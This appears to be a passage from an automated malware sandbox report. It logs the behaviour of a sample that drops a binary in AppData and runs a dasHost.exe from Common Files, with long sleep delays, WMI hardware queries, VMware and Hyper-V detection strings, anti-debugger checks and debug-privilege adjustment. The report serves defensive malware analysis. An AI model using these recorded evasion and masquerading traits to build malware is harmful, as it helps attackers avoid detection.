                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -569828s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -569652s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -569547s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -569438s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -569328s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -569219s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -569099s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -568975s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -568646s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -568281s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -568156s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -568047s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -567937s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -567828s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -567718s >= -30000s
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe TID: 2160Thread sleep time: -567609s >= -30000s
                                    Source: C:\Windows\System32\svchost.exe TID: 8600Thread sleep time: -30000s >= -30000s
                                    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00F0A69B
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00F1C220
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1E6A3 VirtualQuery,GetSystemInfo,0_2_00F1E6A3
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 30000
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 600000
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 599868
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 599672
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 598891
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 598219
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 3600000
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 597750
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 597391
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 596688
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 596266
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 595969
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 595438
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 595154
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 594875
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 594555
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 594203
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 593953
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 593669
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 593328
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 593010
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 592656
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 592402
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 592078
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 591781
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 591391
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 591094
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 590359
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 589968
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 589469
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 589063
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 588547
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 587266
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 586928
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 586484
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 586063
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 585484
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 584531
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 584078
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 583594
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 583188
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 582702
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 581719
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 581336
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580906
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580672
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580503
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580281
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 580031
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 579762
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 579429
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578953
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578703
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578484
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578266
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 578065
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577828
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577670
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577500
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577248
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 577094
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 576828
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 576641
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 575922
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 575719
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 575479
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 575239
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574984
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574688
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574496
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574363
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574234
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574125
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 574012
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 573896
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 573752
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 573547
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 573084
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572953
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572843
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572712
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572609
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572438
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572281
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572172
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 572061
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571900
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571770
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571641
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571513
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571406
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571297
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571175
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 571031
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570904
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570797
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570683
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570578
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570469
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570353
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570247
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570121
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 570016
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569828
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569652
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569547
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569438
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569328
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569219
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 569099
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568975
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568646
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568281
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568156
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 568047
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 567937
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 567828
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 567718
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeThread delayed: delay time: 567609
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: HyperPortContainerproviderinto.exe, 00000004.00000002.1917172574.000000001B387000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
                                    Source: ZZ2sTsJFrt.exe, 00000000.00000003.1681051270.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                                    Source: AaHCyFZRuOMjGDqdgJ.exe2.4.drBinary or memory string: trnUQvMCIHI
                                    Source: ZZ2sTsJFrt.exe, 00000000.00000003.1681051270.0000000003212000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yKZ
                                    Source: w32tm.exe, 0000002C.00000002.1845188043.000002AFC3060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeAPI call chain: ExitProcess graph end nodegraph_0-25065
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F1F838
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F27DEE mov eax, dword ptr fs:[00000030h]0_2_00F27DEE
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F2C030 GetProcessHeap,0_2_00F2C030
                                    Source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F1F838
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1F9D5 SetUnhandledExceptionFilter,0_2_00F1F9D5
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F1FBCA
